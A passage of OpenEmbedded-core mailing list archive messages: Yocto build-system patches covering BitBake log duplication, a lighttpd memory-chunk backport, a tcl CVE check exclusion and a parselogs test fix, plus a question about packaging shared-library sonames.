On Friday 03 September 2021 at 13:55:21 +0200, Martin Jansa wrote: > * the output is shown 3 times with default configuration and 5 times when > --verbose > is being used with knotty, there might be other use-cases where we actually > need > this, but until the logging is resolved better, setting this to empty looks > like > more reasonable option (considering that e.g. log.do_compile from > chromium-x11 > can be over 50MB long, generating 150MB+ cooker log) > > * more details in: > https://bugzilla.yoctoproject.org/show_bug.cgi?id=14542 > > Signed-off-by: Martin Jansa > --- > meta/conf/distro/include/default-distrovars.inc | 6 -- > meta/conf/documentation.conf| 2 +- > 2 files changed, 5 insertions(+), 3 deletions(-) > > diff --git a/meta/conf/distro/include/default-distrovars.inc > b/meta/conf/distro/include/default-distrovars.inc > index f91df632d5..5035508b98 100644 > --- a/meta/conf/distro/include/default-distrovars.inc > +++ b/meta/conf/distro/include/default-distrovars.inc > @@ -33,8 +33,10 @@ BB_GENERATE_MIRROR_TARBALLS ??= "0" > > NO32LIBS ??= "1" > > -# Default to emitting logfiles if a build fails. > -BBINCLUDELOGS ??= "yes" > +# Default logger already emits logfiles if a build fails, setting this to > any non-empty value would just include more copies (prefixed with "|") in the > output > +# https://bugzilla.yoctoproject.org/show_bug.cgi?id=14542 > +BBINCLUDELOGS ??= "" > + > SDK_VERSION ??= "nodistro.0" > DISTRO_VERSION ??= "nodistro.0" > > diff --git a/meta/conf/documentation.conf b/meta/conf/documentation.conf > index c5a38b0764..f4697e28d0 100644 > --- a/meta/conf/documentation.conf > +++ b/meta/conf/documentation.conf > @@ -88,7 +88,7 @@ BBFILE_COLLECTIONS[doc] = "Lists the names of configured > layers. These names are > BBFILE_PATTERN[doc] = "Variable that expands to match files from BBFILES in > a particular layer. This variable is used in the layer.conf file and must be > suffixed with the name of a layer." > BBFILE_PRIORITY[doc] = "Assigns the priority for recipe files in each layer. > Setting this variable allows you to prioritize a layer against other layers > that contain the same recipe." > BBFILES[doc] = "List of recipe files used by BitBake to build software." > -BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on > build failure." > +BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on > build failure. Set to empty if you don't want to have 2nd copy of failed task > output (prefixed with '|') in the cooker log." > BBINCLUDELOGS_LINES[doc] = "Amount of log lines printed on failure." > BBLAYERS[doc] = "Lists the layers to enable during the build. This variable > is defined in the bblayers.conf configuration file." > BBMASK[doc] = "Prevents BitBake from processing specific recipes or recipe > append files." > -- > 2.32.0 This patch (when applied to Dunfell) appears to solve the problem for me. I now only get a single copy of the log output in both the output from bitbake and the cooker log. Whether it's the right solution or not I cannot say, though. :) Thanks! Mike. -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155651): https://lists.openembedded.org/g/openembedded-core/message/155651 Mute This Topic: https://lists.openembedded.org/mt/85349515/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [RFC][PATCH] default-distrovars.inc: Set BBINCLUDELOGS to empty to disable printing failed task output multiple times
* the output is shown 3 times with default configuration and 5 times when --verbose is being used with knotty, there might be other use-cases where we actually need this, but until the logging is resolved better, setting this to empty looks like more reasonable option (considering that e.g. log.do_compile from chromium-x11 can be over 50MB long, generating 150MB+ cooker log) * more details in: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14542 Signed-off-by: Martin Jansa --- meta/conf/distro/include/default-distrovars.inc | 6 -- meta/conf/documentation.conf| 2 +- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc index f91df632d5..5035508b98 100644 --- a/meta/conf/distro/include/default-distrovars.inc +++ b/meta/conf/distro/include/default-distrovars.inc @@ -33,8 +33,10 @@ BB_GENERATE_MIRROR_TARBALLS ??= "0" NO32LIBS ??= "1" -# Default to emitting logfiles if a build fails. -BBINCLUDELOGS ??= "yes" +# Default logger already emits logfiles if a build fails, setting this to any non-empty value would just include more copies (prefixed with "|") in the output +# https://bugzilla.yoctoproject.org/show_bug.cgi?id=14542 +BBINCLUDELOGS ??= "" + SDK_VERSION ??= "nodistro.0" DISTRO_VERSION ??= "nodistro.0" diff --git a/meta/conf/documentation.conf b/meta/conf/documentation.conf index c5a38b0764..f4697e28d0 100644 --- a/meta/conf/documentation.conf +++ b/meta/conf/documentation.conf @@ -88,7 +88,7 @@ BBFILE_COLLECTIONS[doc] = "Lists the names of configured layers. These names are BBFILE_PATTERN[doc] = "Variable that expands to match files from BBFILES in a particular layer. This variable is used in the layer.conf file and must be suffixed with the name of a layer." BBFILE_PRIORITY[doc] = "Assigns the priority for recipe files in each layer. Setting this variable allows you to prioritize a layer against other layers that contain the same recipe." BBFILES[doc] = "List of recipe files used by BitBake to build software." -BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on build failure." +BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on build failure. Set to empty if you don't want to have 2nd copy of failed task output (prefixed with '|') in the cooker log." BBINCLUDELOGS_LINES[doc] = "Amount of log lines printed on failure." BBLAYERS[doc] = "Lists the layers to enable during the build. This variable is defined in the bblayers.conf configuration file." BBMASK[doc] = "Prevents BitBake from processing specific recipes or recipe append files." -- 2.32.0 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155650): https://lists.openembedded.org/g/openembedded-core/message/155650 Mute This Topic: https://lists.openembedded.org/mt/85349515/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [poky][dunfell][PATCHv6] lighttpd: Add patch for reuse large memory chunks
Added 0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch to fix large memory usage for large file downloads from dynamic backends reuse or release large memory chunks. Also, added patch to set default chunk size 8k earlier it was 4k. This issue is caused by a bug in the lighttpd 1.4.55 version and has been fixed in lighttpd 1.4.58. Hence, it is not needed for master and hardknott branch because lighttpd has 1.4.59 version. Link: https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 Link: https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 Signed-off-by: Purushottam Choudhary --- ...or-pcre-dependency-instead-of-config.patch | 10 +- ...-mem-chunks-fix-mem-usage-fixes-3033.patch | 224 ++ .../lighttpd/default-chunk-size-8k.patch | 35 +++ .../lighttpd/lighttpd_1.4.55.bb | 2 + 4 files changed, 265 insertions(+), 6 deletions(-) create mode 100644 meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch create mode 100644 meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch @@ -1,4 +1,4 @@ -From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 +From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin Date: Fri, 26 Aug 2016 18:20:32 +0300 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. @@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. RP 2014/5/22 Upstream-Status: Pending Signed-off-by: Alexander Kanavin + --- configure.ac | 16 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/configure.ac b/configure.ac -index 5383cec..c29a902 100644 +index dbddfb9..62cf17f 100644 --- a/configure.ac +++ b/configure.ac -@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], +@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], ) AC_MSG_RESULT([$WITH_PCRE]) @@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 else AC_PATH_PROG([PCRECONFIG], [pcre-config]) if test -n "$PCRECONFIG"; then --- -2.15.0 - diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 00..e226366112 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch @@ -0,0 +1,224 @@ +From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 +From: Glenn Strauss +Date: Wed, 23 Dec 2020 23:14:47 -0500 +Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) + +(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) + +(thx flynn) + +fix large memory usage for large file downloads from dynamic backends + +reuse or release large memory chunks + +x-ref: + "Memory Growth with PUT and full buffered streams" + https://redmine.lighttpd.net/issues/3033 + +Upstream-Status: Backport +Comment: Hunk refreshed to make it backword compatible. +https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 +Signed-off-by: Purushottam Choudhary + +--- + src/chunk.c| 99 +- + src/chunk.h| 2 + + src/http-header-glue.c | 2 +- + 3 files changed, 82 insertions(+), 21 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 133308f..d7259b9 100644 +--- a/src/chunk.c b/src/chunk.c +@@ -28,16 +28,20 @@ + static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; ++static int chunks_oversized_n; + static array *chunkqueue_default_tempdirs = NULL; + static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +-chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; ++size_t x = 1024; ++while (x < sz && x < (1u << 30)) x <<= 1; ++chunk_buf_sz = sz > 0 ? x : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) + { ++chunk_buf_sz = 8192; + chunkqueue_default_tempdirs = NULL; + chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + } +@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { + free(c); + } + +-buffer *
[OE-core] wanting to clarify some shared lib install and packaging issues
some really basic observations and questions about shared libs from BB recipes as i'm trying to resolve some issues related to a weird hybrid build system that overrides the standard do_install() task by manually populating the "image" directory for each recipe, then hands control over to bitbake to take it from there. first, quick review as i am going to have to explain all this to some folks, so let's make sure i don't sound like an idiot. from the explanation here: https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html when a BB recipe creates a shared lib, i typically expect to see the following under image/usr/lib/ (example from "nettle" directory building for aarch64): libhogweed.so -> libhogweed.so.6.4 [linker name] libhogweed.so.6 -> libhogweed.so.6.4[soname] libhogweed.so.6.4 [real name, actual lib] based on default packaging defined in bitbake.conf, i then expect to see the "base" package "nettle" install the following on the target: libhogweed.so.6 -> libhogweed.so.6.4 libhogweed.so.6.4 while the development package nettle-dev will contain support the linker name linking to, well, one of the above: libhogweed.so -> libhogweed.so.6.4 so far, nothing interesting, but this packaging means that, on the target, if something needs to link against the libhogweed library, it would normally link using the soname, "libhogweed.so.6", so a file by that name *must* exist on the target and, normally, it does (even if it's a symlink). here's what i just ran into -- this hybrid system that bypasses the normal BB install step and manually populates the image directory makes a bit of a mess with setting the symlinks and names properly, but this was "fixed" by totally redefining the standard recipe packaging, so that *all* shared lib files (all three forms) were stuffed into the base package. and as long as that weird repackaging was in place, everything "worked". along comes me, who really hates this re-definition of what goes into each package as it packages far more for the target than is necessary, and i revert the packaging back to the standard ... and things break, and here's why. the end result of the weird hybrid installation and my reverting the packaging is that what ended up on the target in terms of the shared libs was simply: libfubar.so that is, the actual shared lib (not a symlink), but with the linker name, not the soname, which would appear to be the cause of all sorts of things suddenly not running anymore, as a quick inspection showed systemd services trying to start and complaining: ... error while loading shared libraries: libfubar.so.1 ... so i just want to confirm that all of that is due to the shared lib having been packaged and installed on the target via its linker name, not its proper soname, correct? it *seems* like that's all i have to fix, but am i overlooking anything? as long as the shared lib is findable via its soname, should that be the general solution? rday -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155648): https://lists.openembedded.org/g/openembedded-core/message/155648 Mute This Topic: https://lists.openembedded.org/mt/85348808/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH] tcl: Exclude CVE-2021-35331 from checks
Upstream don't believe this is an issue. Signed-off-by: Richard Purdie --- meta/recipes-devtools/tcltk/tcl_8.6.11.bb | 4 1 file changed, 4 insertions(+) diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.11.bb b/meta/recipes-devtools/tcltk/tcl_8.6.11.bb index 1e91f0827ed..cb9e486698c 100644 --- a/meta/recipes-devtools/tcltk/tcl_8.6.11.bb +++ b/meta/recipes-devtools/tcltk/tcl_8.6.11.bb @@ -29,6 +29,10 @@ SRC_URI[sha256sum] = "cfb49aab82bd179651e23eeeb69606f51b0ddc575ca55c3d35e2457469 SRC_URI:class-native = "${BASE_SRC_URI}" +# Upstream don't believe this is an exploitable issue +# https://core.tcl-lang.org/tcl/info/7079e4f91601e9c7 +CVE_CHECK_WHITELIST += "CVE-2021-35331" + UPSTREAM_CHECK_REGEX = "tcl(?P\d+(\.\d+)+)-src" S = "${WORKDIR}/${BPN}${PV}" -- 2.32.0 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155647): https://lists.openembedded.org/g/openembedded-core/message/155647 Mute This Topic: https://lists.openembedded.org/mt/85347830/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-
[OE-core] [PATCH] oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86 machines
This log checking fix is needed for both qemux86 and qemux86-64 so move to the common section. [YOCTO #14528] Signed-off-by: Richard Purdie --- meta/lib/oeqa/runtime/cases/parselogs.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py index 5db02165975..2b8893d842d 100644 --- a/meta/lib/oeqa/runtime/cases/parselogs.py +++ b/meta/lib/oeqa/runtime/cases/parselogs.py @@ -91,6 +91,7 @@ qemux86_common = [ "glamor initialization failed", "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)", "floppy: error", +'failed to IDENTIFY (I/O error, err_mask=0x4)', ] + common_errors ignore_errors = { @@ -98,7 +99,6 @@ ignore_errors = { 'qemux86' : [ 'Failed to access perfctr msr (MSR', 'pci :00:00.0: [Firmware Bug]: reg 0x..: invalid BAR (can\'t size)', -'failed to IDENTIFY (I/O error, err_mask=0x4)', ] + qemux86_common, 'qemux86-64' : qemux86_common, 'qemumips' : [ -- 2.32.0 -=-=-=-=-=-=-=-=-=-=-=- Links: You receive all messages sent to this group. View/Reply Online (#155646): https://lists.openembedded.org/g/openembedded-core/message/155646 Mute This Topic: https://lists.openembedded.org/mt/85347322/21656 Group Owner: openembedded-core+ow...@lists.openembedded.org Unsubscribe: https://lists.openembedded.org/g/openembedded-core/unsub [arch...@mail-archive.com] -=-=-=-=-=-=-=-=-=-=-=-